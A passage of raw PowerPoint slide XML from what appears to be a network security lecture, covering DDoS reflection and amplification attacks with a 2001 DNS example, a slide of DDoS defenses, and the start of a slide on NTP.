            <a:ext cx="763588" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31776" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8353425" y="7339013"/>
            <a:ext cx="763588" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31777" name="TextBox 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1885950" y="8496300"/>
            <a:ext cx="2520950" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source IP = Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31778" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2517775" y="7581900"/>
            <a:ext cx="1143000" cy="889000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88E9647C-6C1B-4655-A4A2-1856091F0A86}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="787400" y="1066800"/>
            <a:ext cx="11623675" cy="893763"/>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DDoS: Reflection attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spoof source IP address = victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> generate lengthy or numerous replies for short requests: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>amplification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Without amplification: would it make sense?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>January 2001 attack: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>requests for large DNS record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generated 60-90 Mbps of traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Large DNSSEC and TXT fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflection attack can be also be done with Web and other services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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB60E2D2-CBC6-4DCE-B64E-B2663BD29DEE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="8286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dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="2073275"/>
            <a:ext cx="5418138" cy="6610350"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t let your systems become bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keep systems patched up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Employ egress anti-spoof filtering on external router.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Filter dangerous packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intrusion prevention systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33797" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6654800" y="1981200"/>
            <a:ext cx="5418138" cy="6610350"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Over-provisioning of resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Abundant bandwidth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Large pool of servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ISP needs abundant bandwidth too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Multiple ISPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Signature and anomaly detection and filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Upstream hopefully</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rate limiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Limit # of packets sent from source to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Network Time Protocol (NTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protocol used to sync the time between client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Synchronized timing is extremely important for many security reasons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos requires correct timestamps for tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Syncing logs and alerts for analysis</a:t>
            </a:r>
